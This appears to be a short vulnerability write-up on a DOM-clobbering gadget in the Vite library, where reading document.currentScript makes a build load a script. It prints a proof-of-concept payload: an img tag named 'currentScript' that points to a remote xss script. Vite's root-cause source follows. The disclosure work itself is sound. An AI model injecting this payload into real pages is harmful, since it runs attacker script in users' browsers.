Next generation frontend tooling. It’s fast!
The Vite library was using the document.currentScript property to load additional scripts.
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" type="module" crossorigin src="/assets/libs/vite/index.js"></script>Root Cause
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.src || document.baseURI`,
)
// [...]
const relativeUrlMechanisms: Record<
InternalModuleFormat,
(relativePath: string) => string
> = {
amd: (relativePath) => {
if (relativePath[0] !== '.') relativePath = './' + relativePath
return getResolveUrl(
`require.toUrl('${escapeId(relativePath)}'), document.baseURI`,
)
},
cjs: (relativePath) =>
`(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath,
)} : ${getRelativeUrlFromDocument(relativePath)})`,
es: (relativePath) =>
getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`,
),
iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
// NOTE: make sure rollup generate `module` params
system: (relativePath) =>
getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`,
),
umd: (relativePath) =>
`(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath,
)} : ${getRelativeUrlFromDocument(relativePath, true)})`,
}
Related links:
Found by jackfromeast, ishmeals.